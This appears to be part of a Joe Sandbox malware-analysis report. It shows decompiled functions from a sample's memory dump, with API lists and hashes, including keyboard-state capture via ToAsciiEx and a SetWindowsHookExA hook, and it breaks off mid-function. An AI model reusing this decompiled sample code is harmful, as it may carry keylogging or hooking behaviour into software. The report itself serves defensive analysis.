                                                    • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                    • String ID:
                                                    • API String ID: 1785656124-0
                                                    • Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                    • Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00428D80(intOrPtr __eax, void* __edx) {
                                                    				intOrPtr _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t33;
                                                    				struct HDC__* _t47;
                                                    				intOrPtr _t54;
                                                    				intOrPtr _t58;
                                                    				struct HDC__* _t66;
                                                    				void* _t67;
                                                    				intOrPtr _t76;
                                                    				void* _t81;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t86;
                                                    
                                                    				_t84 = _t86;
                                                    				_push(_t67);
                                                    				_v8 = __eax;
                                                    				_t33 = _v8;
                                                    				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                    					return _t33;
                                                    				} else {
                                                    					E004259F4(_v8);
                                                    					_push(_t84);
                                                    					_push(0x428e5f);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t86;
                                                    					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
                                                    					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                    					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
                                                    					_push(0);
                                                    					L004072E0();
                                                    					_t66 = _t47;
                                                    					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                    					if(_t81 == 0) {
                                                    						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                    					} else {
                                                    						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                                    					}
                                                    					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                                    					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                                    					if(_t82 == 0) {
                                                    						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                    					} else {
                                                    						_push(0xffffffff);
                                                    						_push(_t82);
                                                    						_push(_t66);
                                                    						L00407440();
                                                    						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                                    						_push(_t66);
                                                    						L00407418();
                                                    					}
                                                    					E00425CE8(_v8, _t66);
                                                    					_t58 =  *0x49b8ac; // 0x22f0acc
                                                    					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
                                                    					_pop(_t76);
                                                    					 *[fs:eax] = _t76;
                                                    					_push(0x428e66);
                                                    					return E00425B60(_v8);
                                                    				}
                                                    			}

                                                    APIs
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                      • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                      • Part of subcall function 0042A288: 733AAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                      • Part of subcall function 0042A288: 733AAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                      • Part of subcall function 0042A288: 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                      • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                      • Part of subcall function 0042A288: 733AB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                    • 733AA590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                    • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                    • 733AB410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                    • 733AB150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                    • String ID:
                                                    • API String ID: 2198039625-0
                                                    • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                    • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				short _v6;
                                                    				char _v262;
                                                    				int _v268;
                                                    				char _v272;
                                                    				struct HKL__* _t25;
                                                    				struct HKL__* _t28;
                                                    				int _t30;
                                                    				void* _t45;
                                                    				unsigned int _t52;
                                                    				intOrPtr _t56;
                                                    				int _t65;
                                                    				void* _t68;
                                                    
                                                    				_v272 = 0;
                                                    				_v268 = 0;
                                                    				_t45 = __edx;
                                                    				_push(_t68);
                                                    				_push(0x47699d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t68 + 0xfffffef4;
                                                    				 *0x49ec4c = GetKeyboardLayout(0);
                                                    				GetKeyboardState( &_v262);
                                                    				_t25 =  *0x49ec4c; // 0x0
                                                    				_t28 =  *0x49ec4c; // 0x0
                                                    				_t65 =  *(_t45 + 4);
                                                    				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
                                                    				_t52 =  *(_t45 + 8);
                                                    				if((_t52 & 0x80000000) != 0) {
                                                    					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
                                                    						E00404BA8();
                                                    						E00476A9C(_t45, _v272,  *(_t45 + 4));
                                                    					}
                                                    				} else {
                                                    					if(_t30 <= 0) {
                                                    						 *0x49ec50 =  *(_t45 + 4);
                                                    					} else {
                                                    						E00404BA8();
                                                    						E00476A9C(_t45, _v268,  *(_t45 + 4));
                                                    						 *0x49ec50 = 0;
                                                    					}
                                                    				}
                                                    				_pop(_t56);
                                                    				 *[fs:eax] = _t56;
                                                    				_push(0x4769a4);
                                                    				return E004049E4( &_v272, 2);
                                                    			}

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 004768CA
                                                    • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                    • MapVirtualKeyExA.USER32(?,00000002,00000000), ref: 004768FF
                                                    • ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00476906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Keyboard$AsciiLayoutStateVirtual
                                                    • String ID:
                                                    • API String ID: 692081290-0
                                                    • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                    • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				int _t27;
                                                    				void* _t40;
                                                    				int _t41;
                                                    				int _t50;
                                                    
                                                    				_t50 = _t41;
                                                    				_t49 = __edx;
                                                    				_t40 = __eax;
                                                    				if(E0044DEB4(__eax) == 0) {
                                                    					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                    				}
                                                    				_v8 = 0;
                                                    				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                    					_t27 = GetMenuItemID(_t49, _t50);
                                                    					_t51 = _t27;
                                                    					if(_t27 != 0xffffffff) {
                                                    						_v8 = E0044DD30(_t40, 0, _t51);
                                                    					}
                                                    				} else {
                                                    					_t49 = GetSubMenu(_t49, _t50);
                                                    					_v8 = E0044DD30(_t40, 1, _t37);
                                                    				}
                                                    				if(_v8 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					 *_a12 = 0;
                                                    					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                    					return E00409F88(_a12, _t49);
                                                    				}
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ItemStateString
                                                    • String ID:
                                                    • API String ID: 306270399-0
                                                    • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                    • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 55%
                                                    			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				void* _t19;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t36;
                                                    				struct HINSTANCE__* _t40;
                                                    				void* _t42;
                                                    				void* _t43;
                                                    				intOrPtr _t44;
                                                    
                                                    				_t42 = _t43;
                                                    				_t44 = _t43 + 0xfffffff8;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t42);
                                                    				_push(0x474cbf);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t44;
                                                    				_push(_t42);
                                                    				_push(0x474c8c);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t44;
                                                    				_t40 = LoadLibraryA(E00404E80(_v8));
                                                    				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
                                                    				if(_t19 != 0) {
                                                    				}
                                                    				FreeResource(_t19);
                                                    				FreeLibrary(_t40);
                                                    				_pop(_t35);
                                                    				 *[fs:eax] = _t35;
                                                    				_pop(_t36);
                                                    				 *[fs:eax] = _t36;
                                                    				_push(0x474cc6);
                                                    				return E004049E4( &_v12, 2);
                                                    			}

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                    • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                    • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibraryResource$FindLoad
                                                    • String ID:
                                                    • API String ID: 622515136-0
                                                    • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                    • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                    				CHAR* _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t18;
                                                    				void* _t23;
                                                    				CHAR* _t24;
                                                    				void* _t25;
                                                    				struct HRSRC__* _t29;
                                                    				void* _t30;
                                                    				struct HINSTANCE__* _t31;
                                                    				void* _t32;
                                                    
                                                    				_v8 = _t24;
                                                    				_t31 = __edx;
                                                    				_t23 = __eax;
                                                    				_t29 = FindResourceA(__edx, _v8, _a4);
                                                    				 *(_t23 + 0x10) = _t29;
                                                    				_t33 = _t29;
                                                    				if(_t29 == 0) {
                                                    					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
                                                    					_pop(_t24);
                                                    				}
                                                    				_t5 = _t23 + 0x10; // 0x41e23c
                                                    				_t30 = LoadResource(_t31,  *_t5);
                                                    				 *(_t23 + 0x14) = _t30;
                                                    				_t34 = _t30;
                                                    				if(_t30 == 0) {
                                                    					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
                                                    				}
                                                    				_t7 = _t23 + 0x10; // 0x41e23c
                                                    				_push(SizeofResource(_t31,  *_t7));
                                                    				_t8 = _t23 + 0x14; // 0x41dd60
                                                    				_t18 = LockResource( *_t8);
                                                    				_pop(_t25);
                                                    				return E0041DD20(_t23, _t25, _t18);
                                                    			}

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                    • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                    • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                    • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                    • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00438CE0(struct HWND__* __eax, void* __ecx) {
                                                    				intOrPtr _t9;
                                                    				signed int _t16;
                                                    				struct HWND__* _t19;
                                                    				DWORD* _t20;
                                                    
                                                    				_t17 = __ecx;
                                                    				_push(__ecx);
                                                    				_t19 = __eax;
                                                    				_t16 = 0;
                                                    				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                                    					_t9 =  *0x49eb28; // 0x0
                                                    					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
                                                    						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
                                                    					} else {
                                                    						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
                                                    					}
                                                    				}
                                                    				return _t16;
                                                    			}

                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                    • GetPropA.USER32 ref: 00438D22
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                    • String ID:
                                                    • API String ID: 2582817389-0
                                                    • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                    • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458F44(void* __ecx) {
                                                    				void* _t2;
                                                    				DWORD* _t7;
                                                    
                                                    				_t2 =  *0x49ebb8; // 0x0
                                                    				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                    					if( *0x49ebd0 == 0) {
                                                    						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
                                                    						 *0x49ebd0 = _t2;
                                                    					}
                                                    					if( *0x49ebcc == 0) {
                                                    						_t2 = CreateEventA(0, 0, 0, 0);
                                                    						 *0x49ebcc = _t2;
                                                    					}
                                                    					if( *0x49ebd4 == 0) {
                                                    						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
                                                    						 *0x49ebd4 = _t2;
                                                    					}
                                                    				}
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                    • SetWindowsHookExA.USER32 ref: 00458F6C
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                    • CreateThread.KERNEL32 ref: 00458FAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                    • String ID:
                                                    • API String ID: 1195359707-0
                                                    • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                    • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 48%
                                                    			E00460AA0(signed int __eax) {
                                                    				signed int _t1;
                                                    				signed int _t2;
                                                    
                                                    				_t1 = __eax;
                                                    				_push(0);
                                                    				L00407638();
                                                    				_t2 = __eax;
                                                    				_push(0xc);
                                                    				_push(__eax);
                                                    				L00407380();
                                                    				_push(0xe);
                                                    				_push(__eax);
                                                    				L00407380();
                                                    				if(__eax * __eax > 8) {
                                                    					 *0x49c08f = 0;
                                                    				} else {
                                                    					 *0x49c08f = 1;
                                                    				}
                                                    				_push(_t2);
                                                    				_push(0);
                                                    				L00407888();
                                                    				return _t1;
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                    • 733AB380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                    • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr* _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int* _v24;
                                                    				signed int* _v28;
                                                    				signed int _v32;
                                                    				signed int* _v36;
                                                    				intOrPtr _v40;
                                                    				signed int _v44;
                                                    				intOrPtr _v48;
                                                    				char _v52;
                                                    				char _v84;
                                                    				signed int _v1620;
                                                    				signed int _t142;
                                                    				intOrPtr _t143;
                                                    				intOrPtr* _t144;
                                                    				intOrPtr _t147;
                                                    				signed char _t157;
                                                    				signed char _t158;
                                                    				signed int* _t165;
                                                    				signed int _t207;
                                                    				signed int _t208;
                                                    				void* _t209;
                                                    				intOrPtr _t224;
                                                    				intOrPtr _t225;
                                                    				intOrPtr _t226;
                                                    				intOrPtr _t227;
                                                    				signed int _t256;
                                                    				intOrPtr* _t258;
                                                    				void* _t260;
                                                    				void* _t261;
                                                    				intOrPtr _t262;
                                                    				void* _t276;
                                                    
                                                    				_t276 = __fp0;
                                                    				_t260 = _t261;
                                                    				_t262 = _t261 + 0xfffff9b0;
                                                    				_v12 = __ecx;
                                                    				_t258 = __edx;
                                                    				_v8 = __eax;
                                                    				_t224 =  *0x417dc0; // 0x417dc4
                                                    				E004053AC( &_v84, _t224);
                                                    				_push(_t260);
                                                    				_push(0x4787af);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t262;
                                                    				_v20 = 0;
                                                    				_t211 = 0;
                                                    				_push(_t260);
                                                    				_push(0x47878c);
                                                    				_push( *[fs:ecx]);
                                                    				 *[fs:ecx] = _t262;
                                                    				_t256 =  *(__edx + 1) & 0x000000ff;
                                                    				if(_t256 > 0x40) {
                                                    					_t211 =  *0x49d980; // 0x477e3c
                                                    					E0040D200(_t211, 1);
                                                    					E00404378();
                                                    				}
                                                    				if(_t256 == 0) {
                                                    					L25:
                                                    					_v52 =  &_v1620;
                                                    					_v48 = _v12 + 4;
                                                    					_v44 = _t256;
                                                    					_v40 = 0;
                                                    					_t225 =  *_v12;
                                                    					_t142 =  *_t258;
                                                    					if(0 != 4) {
                                                    						__eflags = 0 - 1;
                                                    						if(0 == 1) {
                                                    							__eflags = _t256;
                                                    							if(__eflags == 0) {
                                                    								__eflags = _a4;
                                                    								if(__eflags != 0) {
                                                    									_t142 = 3;
                                                    								}
                                                    							}
                                                    						}
                                                    					} else {
                                                    						if((_v1620 & 0x00000fff) == 9) {
                                                    							_t142 = 8;
                                                    						}
                                                    						 *_v12 = 0xfffffffd;
                                                    						_v48 = _v48 - 4;
                                                    						_v40 = _v40 + 1;
                                                    					}
                                                    					_push(0);
                                                    					_push( &_v84);
                                                    					_push(_a4);
                                                    					_push( &_v52);
                                                    					_push(_t142);
                                                    					_push(0);
                                                    					_t143 =  *0x49d770; // 0x49b500
                                                    					_push(_t143);
                                                    					_push(_t225);
                                                    					_t144 = _v8;
                                                    					_push(_t144);
                                                    					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
                                                    						E00478A5C();
                                                    					}
                                                    					_t207 = _v20;
                                                    					if(_t207 == 0) {
                                                    						L39:
                                                    						_t147 = 0;
                                                    						_pop(_t226);
                                                    						 *[fs:eax] = _t226;
                                                    						_push(0x478793);
                                                    						_t208 = _v20;
                                                    						if(_t208 == 0) {
                                                    							L41:
